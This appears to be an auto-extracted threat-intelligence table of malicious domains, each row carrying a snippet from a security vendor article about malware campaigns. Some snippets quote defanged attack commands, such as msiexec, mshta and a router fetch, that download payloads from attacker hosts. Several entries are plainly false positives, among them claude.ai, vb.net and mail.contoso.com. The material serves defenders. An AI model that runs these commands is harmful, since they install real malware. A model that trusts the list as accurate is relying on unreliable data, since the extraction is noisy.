Indicators of compromise
1,890 indicators auto-extracted from article text · hashes, IPs, domains, URLs · verify before use
| Type | Indicator | Context | Article | First seen |
|---|---|---|---|---|
| domain | steelseries-cn.com.cn | apture draw.io cn-drawio[.]com[.]cn Diagramming SteelSeries steelseries-cn[.]com[.]cn Peripherals Sogou gw-sogou[.]com[.]cn Input method Cali | Counterfeit installers to system compromise: Tracking a deceptive software download campaign Microsoft Security Blog | · 15d ago |
| domain | translate-youdao.hl.cn | PDF sejda[.]hl[.]cn Productivity NetEase Youdao Dictionary translate-youdao[.]hl[.]cn Translation DiskGenius zh-diskgenius[.]com[.]cn Disk ut | Counterfeit installers to system compromise: Tracking a deceptive software download campaign Microsoft Security Blog | · 15d ago |
| domain | www.gehie246.com | ns. pc-razerzone[.]com[.]cn (spoofed Razer download site) → www[.]gehie246[.]com/712down → app_setup.6653004.zip → stage-one loader A de | Counterfeit installers to system compromise: Tracking a deceptive software download campaign Microsoft Security Blog | · 15d ago |
| domain | yimxg25tiy.com | nation page that served it and to rotating delivery hosts ( yimxg25tiy[.]com/73inst , cc8ttkv35b[.]com/7qinst , n7b8t85zsg[.]com/ins71 | Counterfeit installers to system compromise: Tracking a deceptive software download campaign Microsoft Security Blog | · 15d ago |
| domain | zh-diskgenius.com.cn | ictionary translate-youdao[.]hl[.]cn Translation DiskGenius zh-diskgenius[.]com[.]cn Disk utility Baidu Netdisk (Pan) baidu-pan[.]com[.]cn C | Counterfeit installers to system compromise: Tracking a deceptive software download campaign Microsoft Security Blog | · 15d ago |
| domain | aguamammillaria.cfd | h4htc0h0ggdh.canadacentral-01.azurewebsites[.]net plosancol.aguamammillaria[.]cfd crironxil.aguasedum[.]cfd TCP traffic to another domain: | Guildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st) SANS Internet Storm Center | · 15d ago |
| domain | aguasedum.cfd | urewebsites[.]net plosancol.aguamammillaria[.]cfd crironxil.aguasedum[.]cfd TCP traffic to another domain: tcp[:]//omzagdmspc.a.pingg | Guildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st) SANS Internet Storm Center | · 15d ago |
| domain | azurewebsites.net | e text: hxxps[:]//sistema-ekg3h4htc0h0ggdh.canadacentral-01.azurewebsites[.]net/ Downloaded zip archive and extracted Windows shortcut: S | Guildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st) SANS Internet Storm Center | · 15d ago |
| domain | colombstracciatella.cfd | r: "Contrato Via Docusing" <[email protected][.]cfd> Date: Wed, 26 Aug 2026 19:01:16 -0300 Subject: Assine co | Guildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st) SANS Internet Storm Center | · 15d ago |
| domain | pinggy.link | m[.]cfd TCP traffic to another domain: tcp[:]//omzagdmspc.a.pinggy[.]link:21601/ Note: I saw HTTPS traffic to WhatsApp and GitHub d | Guildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st) SANS Internet Storm Center | · 15d ago |
| domain | centrodigestionedellarapina.life | ate. Indicators of compromise (IOCs) Drainer infrastructure centrodigestionedellarapina[.]life dasunerforschtelandamendederwelt[.]sbs Solana address use | Fake GTA 6 leaked copy drains your crypto wallet Malwarebytes Labs | · 16d ago |
| domain | dasunerforschtelandamendederwelt.sbs | ) Drainer infrastructure centrodigestionedellarapina[.]life dasunerforschtelandamendederwelt[.]sbs Solana address used by the page’s inline transfer 21iWU6F | Fake GTA 6 leaked copy drains your crypto wallet Malwarebytes Labs | · 16d ago |
| domain | ip.me | ’t belong to the face on the video call. “The user accessed ip[.]me directly to determine their public-facing IP address just | North Korea-linked IT Workers Are Getting Hired Inside Western Companies Security Affairs | · 16d ago |
| domain | claude.ai | so: How attackers hosted a fake Claude download page on the claude.ai domain Subscribe to our breaking news e-mail alert to never | Anthropic locks out Claude users after infostealers hijack login sessions Help Net Security | · 17d ago |
| domain | hunt.io | oud and WordPress systems. The activity was uncovered after Hunt.io found an exposed server in Amsterdam that contained attack | Philippine Nuclear and Naval Targets Hit by Suspected Chinese Operator Security Affairs | · 19d ago |
| domain | docopened.jpg | hxxp://webhook[.]site/62114596-33f5-47fb-9012-0223529e5a13/docopened[.]jpg. This serves as a document-open “canary,” alerting BlueDe | Russian APT BlueDelta Uses HOOKEDGE to Target Defense and Diplomatic Organizations Security Affairs | · 20d ago |
| domain | webhook.site | ins a hidden image referencing a remote webhook URL: hxxp://webhook[.]site/62114596-33f5-47fb-9012-0223529e5a13/docopened[.]jpg. Thi | Russian APT BlueDelta Uses HOOKEDGE to Target Defense and Diplomatic Organizations Security Affairs | · 20d ago |
| domain | ajax.net | tructure Security Agency (CISA) adds Red Hat, Linux Kernel, Ajax.NET Professional, Microsoft SQL Server, and Citrix NetScaler fl | U.S. CISA adds Red Hat, Linux Kernel, Ajax.NET Professional, Microsoft SQL Server, and Citrix NetScaler flaws to its Known Exploited Vulnerabilities catalog Security Affairs | · 20d ago |
| domain | getpdfdigital.cloud | er to a shortened URL that resolves through a redirector to getpdfdigital[.]cloud, a known attacker site used to stage malicious payloads. | Dark Caracal Deploys New Go Malware With Ethereum-Based C2 Fallback Security Affairs | · 20d ago |
| domain | ajax.net | -2015-5287), a Microsoft SQL Server bug (CVE-2019-1068), an Ajax.NET deserialization flaw (CVE-2021-23758), and a Linux Kernel v | Previously patched Citrix NetScaler flaw exploited in the wild (CVE-2026-8452) Help Net Security | · 21d ago |
| domain | nova-client.com | e official websites, only GitHub pages and Discord servers. Nova-client.com is a fake website for a client that has no real website; th | Fake Minecraft Sites Are Still Spreading WeedHack After C2 Takedown Security Affairs | · 23d ago |
| domain | trycloudflare.com | henticated session. In the demo, the fake login page used a trycloudflare.com subdomain, giving the link a valid TLS certificate and a mo | iAuthFlow v2: The $10,000 Phishing Toolkit That Survives Your Password Reset Security Affairs | · 24d ago |
| domain | cardoor.cn | nstructions from a message broker hosted on a domain called cardoor[.]cn, which tells it which app files to download and install. | Android car head units infected with proxy botnet malware through built-in software updaters Help Net Security | · 24d ago |
| domain | classtandscrest.com | ewhere for suspected fraud. The public registration page at classtandscrest[.]com (Source: Allure Security) What to check Researchers recom | A $25 template helped scammers build hundreds of phantom bank domains Help Net Security | · 27d ago |
| domain | remedycodes.site | n form was set to send submitted data to a separate domain, remedycodes[.]site. Researchers did not submit the form. That same Remedy ad | A $25 template helped scammers build hundreds of phantom bank domains Help Net Security | · 27d ago |
| domain | dtm.kijangturbo88.top | that communicated with Telegram-based infrastructure, using dtm[.]kijangturbo88[.]top as its command-and-control endpoint. “While the malware | Fake Gemini installer delivers Vidar infostealer via Google Colab lure Help Net Security | · 28d ago |
| domain | fd6fq54s6df541q23sdxfg.eu | mmand is used to download a binary called nvr from http://y.fd6fq54s6df541q23sdxfg[.]eu/nvr 1 2 3 4 / bin / sh - c nvram set rc_firewall = "sleep | Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices Palo Alto Unit 42 | · 29d ago |
| domain | mods.net | .156[.]190/.y/pty5 hxxp://159.89.156[.]190/.y/pty6 s.shadow.mods[.]net Samples Filename SHA256 File type tty0 492780a9ac9f033055 | Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices Palo Alto Unit 42 | · 29d ago |
| domain | eleethub.com | s from Eleethub The domain associated with the C2 server is eleethub[.]com . We visited the website and found a message announcing t | Eleethub: A Cryptocurrency Mining Botnet with Rootkit for Self Palo Alto Unit 42 | · 29d ago |
| domain | los.zetas.mx | , and in the information from the botnet operators undead[@]los[.]zetas[.]mx (Figure 15). “Los Zetas” is a reference to a Mexican cr | Eleethub: A Cryptocurrency Mining Botnet with Rootkit for Self Palo Alto Unit 42 | · 29d ago |
| domain | downloads.openwrt.org | in OpenWrt allowed attackers to impersonate downloads from downloads.openwrt.org and make the devices download malicious updates. This means | Risks in IoT Supply Chain Palo Alto Unit 42 | · 29d ago |
| domain | iotlmao.xyz | 5889c244501288b9fa7c7dc7f1e8c5ef1291 Feb 26, 2021 13:14 UTC iotlmao[.]xyz/bins/dark.m68k a6cb6356432ca83467f6da2168be2aabbabe5d2f2d | New Mirai Variant Targeting Network Security Devices Palo Alto Unit 42 | · 29d ago |
| domain | vietdediserver.shop | . This IP address is also associated with the domain cnc.vietdediserver[.]shop , which is a known, malicious domain associated with Mira | A Deep Dive Into Attempted Exploitation of CVE-2023 Palo Alto Unit 42 | · 29d ago |
| domain | digikalas.online | bdirectory leaks the workstation hostname newtuxdev.sevielw.digikalas[.]online Aug. 6, 2025 Developer domain digikalas[.]online register | TuxBot v3: Inside an IoT Botnet Framework With LLM Palo Alto Unit 42 | · 29d ago |
| domain | bynar.io | diting researcher Alfredo Pesoli (@__rev) at Bynario Atlas (bynar.io) for the discovery. “An attacker on the network may be able | U.S. CISA adds Apple macOS, Microsoft SharePoint, Broadcom VMware vCenter, and Microsoft IKE flaws to its Known Exploited Vulnerabilities catalog Security Affairs | · 29d ago |
| domain | tenire.com | Chaos agent binary from an attacker-controlled server ("pan.tenire[.]com"), set permissions to allow all users to read, modify, or | New Chaos Variant Targets Misconfigured Cloud Deployments, Adds SOCKS Proxy The Hacker News | · Aug 18, 2026 |
| domain | payloads.in | ands, performing reconnaissance, and deploying second-stage payloads.In this blog post, ThreatLabz provides a technical analysis of | C2Looper: A New Backdoor Likely Tied To Ransomware With GitHub C2 Zscaler ThreatLabz | · Aug 17, 2026 |
| domain | feed43.com | 85.203.118[.]115 94.156.35[.]204 Dead Drop Resolvers hxxp://feed43[.]com/8166706728852850.xml hxxp://feed43[.]com/3210021137734622 | Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | rapidfeeds.com | an be seen in the following images taken from hxxp:// feeds.rapidfeeds[.]com/88604/, which is one of the dead drop resolvers we encoun | Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | webrss.com | 850.xml hxxp://feed43[.]com/3210021137734622.xml hxxp://www.webrss[.]com/createfeed.php?feedid=49966 hxxp://feeds.rapidfeeds[.]com | Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | facebook-apps.com | t mimic popular technology companies. One of these domains, facebook-apps[.]com, was identified in one of the malware samples associated | RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | jdanief.xyz | ject ( "WScript.Shell" ) . Run "msiexec /q /i http:\\dlj40s.jdanief[.]xyz/images/word3.doc" , 0 > % userProfile % \ AppData \ Local | RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | bookreader.bit | use them. This new sample attempts to resolve two domains, bookreader[.]bit and doghunter[.]bit via the following hardcoded DNS Serve | Upatre Continued to Evolve with new Anti Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | doghunter.bit | ample attempts to resolve two domains, bookreader[.]bit and doghunter[.]bit via the following hardcoded DNS Servers: 31.3.135[.]232 1 | Upatre Continued to Evolve with new Anti Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | almasoodgroup.com | ry 2019, an engineering and hydraulics company in Pakistan, almasoodgroup[.]com was observed hosting two AtraDownloader executables as we | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | aroundtheworld123.net | nhexlify("6E7F7C827B71817572847C7F79713E3F403B7B7281"))) >> aroundtheworld123[.]net The malware proceeds to check to determine if the AVG sec | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | com.pk | ich had the following names, were hosted on the URL khurram.com[.]pk/js/drvn and communicated with the domain nethosttalk[.]co | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | cyberthreatalliance.org | s. For more information on the Cyber Threat Alliance, visit cyberthreatalliance.org. Appendix ArtraDownloader Malware Analysis – Variant 1 For | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | frameworksupport.net | xFF) return out >> print(decode(“iudphzrunvxssruw1qhw”)) >> frameworksupport[.]net It proceeds to attempt to create the C:\intel\ directory, | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | gov.pk | ember 17 and 18 2018, a file was downloaded from http://fst.gov[.]pk/images/winsvc (SHA256: ef0cb0a1…) after a user accessed t | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | khurram.com | bles, which had the following names, were hosted on the URL khurram.com[.]pk/js/drvn and communicated with the domain nethosttalk[. | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | kielsoservice.net | mmunicated with the domains info.viewworld71[.]com or hewle.kielsoservice[.]net. The RMMUN, Roots Metropolitan Model United Nations, is a | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | nethosttalk.com | n Saudi Arabia. The malicious file communicated with the C2 nethosttalk[.]com. Around the same timeframe, two additional files (listed | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | nsiagenthoster.net | om/js/cwqj and communicated with C2 domain thepandaservices.nsiagenthoster[.]net. The domain almasoodgroup[.]com appears to be a legitimat | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | org.pk | op.pdf[.]com Beginning on Nov 6, 2018, the URL http://rmmun.org[.]pk/svch was observed hosting two ArtraDownloader files that | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | pdf.com | the domain nethosttalk[.]com for C2. Handling of Logistics.pdf[.]com Cyber security work shop.pdf[.]com Beginning on Nov 6, 20 | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | viewworld71.com | traDownloader files that communicated with the domains info.viewworld71[.]com or hewle.kielsoservice[.]net. The RMMUN, Roots Metropolit | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | wforc.pk | ed files with the following names hosted on the URL https://wforc[.]pk/js/. Internet Data Traffic Report – August 2018.docx PAF | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | xiovo426.net | mpany’s domain communicated with command and control domain xiovo426[.]net. On 2 Jan 19, the file article_amy.doc was also uploaded | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | zmwardrobe.com | on malicious documents that were downloaded from the domain zmwardrobe[.]com and subsequently executed a payload referred to as MY24. | Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | eseses.tk | ri[.]tk xn--mgbfv9eh74d[.]com (تلگرام[.]com) ytb[.]services eseses[.]tk | New Python-Based Payload MechaFlounder Used by Chafer Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | turkiyeburslari.gov.tr | irrors the legitimate Turkish Scholarship government domain turkiyeburslari[.]gov[.]tr, also resolved to this IP and may likely have been used | New Python-Based Payload MechaFlounder Used by Chafer Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | turkiyeburslari.tk | ly associated with Chafer activity. Of interest, the domain turkiyeburslari[.]tk, which mirrors the legitimate Turkish Scholarship governm | New Python-Based Payload MechaFlounder Used by Chafer Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | win10-update.com | rted earlier in 2018 by Clearsky , specifically, the domain win10-update[.]com. While we lack visibility into the initial delivery mecha | New Python-Based Payload MechaFlounder Used by Chafer Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | win7-update.com | report win10-update[.]com 185.177.59[.]70 134.119.217[.]87 win7-update[.]com turkiyeburslari[.]tk xn--mgbfv9eh74d[.]com (تلگرام[.]com) | New Python-Based Payload MechaFlounder Used by Chafer Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | xn--mgbfv9eh74d.com | ]70 134.119.217[.]87 win7-update[.]com turkiyeburslari[.]tk xn--mgbfv9eh74d[.]com (تلگرام[.]com) ytb[.]services eseses[.]tk | New Python-Based Payload MechaFlounder Used by Chafer Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | ytb.services | m turkiyeburslari[.]tk xn--mgbfv9eh74d[.]com (تلگرام[.]com) ytb[.]services eseses[.]tk | New Python-Based Payload MechaFlounder Used by Chafer Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | bitly.com | the following URL via the "Shell" command: mshta hxxp://www.bitly[.]com/SmexEaldos3 The command above uses the built-in “mshta” a | Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | blogspot.com | alysis, the shortened bit.ly URL redirected to hxxps://bjm9.blogspot[.]com/p/si.html , as seen in the “Location” field of the HTTP r | Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | duckdns.org | ult in the final payload being RevengeRAT configured with a duckdns[.]org domain for C2. During our research, we found several rela | Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | pastebin.com | ding of a portable executable hosted on Pastebin at https://pastebin[.]com/raw/2LDaeHE1 , decoding the base64 downloaded from the UR | Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | vb.net | rom pastebin[.]com/raw/2LDaeHE1 This payload was written in VB.NET and named "Nuclear Explosion," which is a variant of Reveng | Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | wixstatic.com | attempts to load a remote OLE document from hxxps://static.wixstatic[.]com/ugd/05e470_b104c366c1f7423293887062c7354db2.doc : Figure | Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | 6google.com | 2019 Masked winx64-microsoft[.]com 7/15/18 - 7/15/19 Masked 6google[.]com 7/31/18 - 7/31/19 Masked alforatsystem[.]com 5/29/18 - 5/ | xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | alforatsystem.com | /18 - 7/15/19 Masked 6google[.]com 7/31/18 - 7/31/19 Masked alforatsystem[.]com 5/29/18 - 5/29/19 Masked windows64x[.]com 8/18/18 - 8/18/ | xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | check-updates.com | - 10/10/19 Masked pasta58[.]com 12/27/17 - 12/27/18 Masked check-updates[.]com 6/24/18 - 6/24/19 Sofia Weber locas.l[@]yahoo.com travele | xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | firewallsupports.com | lation to pasta58[.]com : Domain Date Registered Registrant firewallsupports[.]com 5/6/2018 - 5/6/2019 Masked winx64-microsoft[.]com 7/15/18 | xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | mail.contoso.com | ing, we were able to enable the C2 channel: hisoka;pass123!;mail.contoso.com;2010 To initiate communications, Hisoka notifies the actor | xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | microsoft-check.com | 18/19 Masked windows-updates[.]com 1/10/18 - 1/10/19 Masked microsoft-check[.]com 10/10/18 - 10/10/19 Masked pasta58[.]com 12/27/17 - 12/27 | xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | microsofte-update.com | ven Hisoka v0.8 samples configured to beacon to the domains microsofte-update[.]com . Each of these samples also contain the following debug | xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | pasta58.com | a samples -- all of which were configured to use the domain pasta58[.]com for its C2 server. During general infrastructure analysis | xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | sakabota.com | domain registration details, we also identified the domain sakabota[.]com whose web server served a page with the title “Outlook We | xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | traveleasy-kw.com | tes[.]com 6/24/18 - 6/24/19 Sofia Weber locas.l[@]yahoo.com traveleasy-kw[.]com 6/13/18 - 6/13/19 Masked Table 1. Domains associated with | xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | windows64x.com | 7/31/19 Masked alforatsystem[.]com 5/29/18 - 5/29/19 Masked windows64x[.]com 8/18/18 - 8/18/19 Masked windows-updates[.]com 1/10/18 - | xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | windows-updates.com | - 5/29/19 Masked windows64x[.]com 8/18/18 - 8/18/19 Masked windows-updates[.]com 1/10/18 - 1/10/19 Masked microsoft-check[.]com 10/10/18 - | xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | winx64-microsoft.com | egistrant firewallsupports[.]com 5/6/2018 - 5/6/2019 Masked winx64-microsoft[.]com 7/15/18 - 7/15/19 Masked 6google[.]com 7/31/18 - 7/31/19 | xHunt Campaign: Attacks on Kuwait Shipping and Transportation Organizations Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | firewallsupports.com | hat communicated with the domains windows-updates[.]com and firewallsupports[.]com , respectively. We do not have telemetry to determine the | xHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | indows64x.com | observed one of these overlapping domains, specifically, w indows64x[.]com , being used as the C2 server for a new PowerShell based | xHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | pasta58.com | unt campaign , we observed several domains with ties to the pasta58[.]com domain associated with known Sakabota command and control | xHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | windows64x.com | er 2019 we observed a host based in Kuwait beaconing to the windows64x[.]com domain using the same DNS tunneling protocol as the CASHY | xHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | windows-updates.com | HY200 PowerShell scripts that communicated with the domains windows-updates[.]com and firewallsupports[.]com , respectively. We do not have | xHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | winx64-microsoft.com | ts seen installing CASHY200, which shows another C2 domain, winx64-microsoft[.]com , used by this threat group. Modified time SHA256 Filenam | xHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | clementeolmos.com | this blog. Date Observed C2 Trickbot Payload SHA256 11/7/19 clementeolmos[.]com/supp.php erfd1.exe 24e3fa3fb1df9bd70071e5b957d180cd51bcf1 | TrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | lindaspryinteriordesign.com | 7a938db9eebe4a0efa573343d89703482cafb2d8 Preview_Report.exe lindaspryinteriordesign[.]com/supp.php nfdusdarm.exe 7d6ff8baebedba414c9f15060f0a847096 | TrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | maisonmarielouise.org | b093e8da7fb666b2d644197fc3ea22b3931a6150c259479b0c 11/19/19 maisonmarielouise[.]org/supp.php SetupDesktop.exe dc8f259fb55a330d1a8e51d91340465 | TrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | savute.in | nloader C2 Trickbot Payload File SHA256 StatementReport.exe savute[.]in/supp.php nfdsus12.exe d1e0902fd1e8b3951e2aec057a938db9eeb | TrickBot Campaign Uses Fake Payroll Emails to Conduct Phishing Attacks Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | 6google.com | update[.]top) 192.99.138[.]6 4/14/2019 - 5/4/2019 Sakabota (6google[.]com) 104.168.136[.]161 6/24/2019 Newly identified DNS redirec | xHunt Campaign: New Watering Hole Identified for Credential Harvesting Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | alforatsystem.com | activity 213.202.217[.]0,22 6/1/2018, 12/24/2018 Sakabota (alforatsystem[.]com) 213.202.217[.]4 9/8/2018 Sakabota (firewallsupports[.]co | xHunt Campaign: New Watering Hole Identified for Credential Harvesting Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | antivirus-update.top | ed DNS redirect activity 192.99.138[.]4 4/24/2019 Sakabota (antivirus-update[.]top) 192.99.138[.]6 4/14/2019 - 5/4/2019 Sakabota (6google[.] | xHunt Campaign: New Watering Hole Identified for Credential Harvesting Palo Alto Unit 42 | · Aug 17, 2026 |
| domain | cloudipnameserver.com | d DNS Hijacking Activity 185.15.247[.]140 1/14/2017 Oilrig (cloudipnameserver[.]com) 185.15.247[.]140 9/9/2018 Sakabota (sakabota[.]com) 185. | xHunt Campaign: New Watering Hole Identified for Credential Harvesting Palo Alto Unit 42 | · Aug 17, 2026 |
Extraction is regex-based (SHA-256/SHA-1/MD5, public IPv4, defanged hxxp/[.] indicators, and bare domains/emails only from malware, actor, exploit, phishing, ransomware and breach articles with a nearby indicator context word). Treat confidence as low until you verify against the source article.